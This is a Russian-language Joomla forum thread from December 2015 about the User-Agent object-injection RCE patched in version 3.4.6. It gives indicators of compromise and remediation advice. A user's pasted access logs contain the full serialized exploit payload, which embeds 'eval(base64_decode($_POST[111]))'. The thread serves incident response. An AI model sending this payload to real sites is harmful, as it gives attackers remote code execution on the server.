Пишут, что опять уязвимость найдена

  • 9 Ответов
  • 1722 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

dmtn

  • ****
  • 271
  • 17
Пишут, что опять уязвимость найдена
http://www.opennet.ru/opennews/art.shtml?num=43521

собственно содержимое:

Разработчики свободной системы управления web-контентом Joomla опубликовали экстренное обновление 3.4.6, в котором устранена критическая уязвимость, позволяющая выполнить произвольный PHP-код на сервере. Проблема усугубляется тем, что она уже активно эксплуатируется злоумышленниками и исправлена после выявления массовой вредоносной активности на сайтах под управлением Joomla. Всем пользователям Joomla рекомендуется незамедлительно установить обновление (патчи для уже не поддерживаемых версий) и провести полный аудит своих систем.

По данным компании Sucuri в сети зафиксирована интенсивная автоматизированная атака, нацеленная на поражение систем, подверженных указанной уязвимости. После запуска нескольких подставных honeypot-систем, в течение дня на всех из них было зафиксировано более сотни попыток проникновения, поэтому после обновления следует обязательно проанализировать систему на предмет возможного проникновения атакующих. Очень высока вероятность, что система, использующая CMS Joomla, уже находится под контролем злоумышленников. Уязвимость начала активно эксплуатироваться как минимум за два дня до выхода исправления.

Проблема проявляется начиная с версии Joomla 1.5.0, выпущенной восемь лет назад, и вызвана отсутствием чистки значения строки с идентификатором браузера (User Agent), перед записью в СУБД. Для атаки достаточно отправить запрос к сайту на базе Joomla c определённым образом установленным значением User Agent. В качестве достаточного условия выявления атаки по логу, упоминается наличие запросов с IP-адресов 146.0.72.83, 74.3.170.33 и 194.28.174.106. Признаком атаки также может быть наличие в логах идентификаторов браузера (User Agent), подпадающих под маски "JDatabaseDriverMysqli" и "O:". Если подобные запросы присутствуют в логе, то можно считать систему поражённой злоумышленниками.


Прошу прощения, что продублировал, оказывается тема уже существует в форуме
http://joomlaforum.ru/index.php/topic,321787.msg1606153/topicseen.html#msg1606153
« Последнее редактирование: 15.12.2015, 10:58:19 от dmtn »


*

revisium

  • ***
  • 37
  • 11
Есть критическая уязвимость (анонсирована позавчера), позволяющая злоумышленнику выполнить удаленный код на сайте. Печальный факт - уязвимость присутствует во всех версиях Joomla (линейка 1.5.x, 2.5.x, 3.x)
Рекомендую всем как можно быстрее установить патч, закрывающий уязвимость. Подробно можно посмотреть по ссылке

https://revisium.com/ru/blog/joomla_rce_all_versions_affected.html

Проблема из-за отсутствия фильтрации переменных запроса (в частности User Agent), и последующего их использования при запросе к БД и десериализации объектов.
Что позволяет удаленно выполнять произвольный код (читай - взломать сайт).

Патч - замена одного файла session.php, есть для Joomla 1.5 и 2.5, а для 3.4.6 лучше сразу обновиться полностью.
--
http://revisium.com/ - лечение сайтов и защита от взлома.

Есть уязвимость, верней была.
Сегодня на один сайт, на Joomla 3.4.5, в папку /libraries/joomla/добавился файл exporter.php.
Содержание файла:
Спойлер
[свернуть]

Посмотрел вчерашнюю рез копию такого файла не было. Стал смотреть логи а там:

185.17.184.228 - - [15/Dec/2015:19:01:24 +0300] "GET / HTTP/1.0" 200 33300 "http://мойсайт.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
142.4.213.25 - - [15/Dec/2015:19:02:14 +0300] "POST / HTTP/1.0" 200 34166 "http://мойсайт.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36"

и на другом сайте, он правда еще на Joomla 2.5.

5.9.36.66 - - [15/Dec/2015:19:02:26 +0300] "GET / HTTP/1.0" 302 281 "http://мойсайт2.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
197.231.221.211 - - [15/Dec/2015:19:02:42 +0300] "GET / HTTP/1.0" 200 15862 "http://мойсайт2.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

Обновился до 3.4.6
Посмотрим


*

flyingspook

  • *****
  • 3606
  • 236
Обновился до 3.4.6
Посмотрим

Вам уже поздно что либо обновлять и смотреть, пора вычищать всю заразу.

Вам уже поздно что либо обновлять и смотреть, пора вычищать всю заразу.
А какую всю заразу? Появился только один новый файл, я его сразу удалил после обновился и поменял пароли. Что не так в моих действиях и о каком дополнительном вычищении идет речь?

*

flyingspook

  • *****
  • 3606
  • 236
А какую всю заразу? Появился только один новый файл, я его сразу удалил после обновился и поменял пароли. Что не так в моих действиях и о каком дополнительном вычищении идет речь?
С чего у Вас уверенность что только один файл появился, вы все содержимое своих файлов про сканировали на появившиеся и измененные файлы.

С чего у Вас уверенность что только один файл появился, вы все содержимое своих файлов про сканировали на появившиеся и измененные файлы.
Файлы с расширением .php да все про сканировал, появился и изменился только один этот файл.

*

flyingspook

  • *****
  • 3606
  • 236
Файлы с расширением .php да все про сканировал, появился и изменился только один этот файл.
Если так то можете спокойно ждать, думаю что как вы пишите у вас все ок.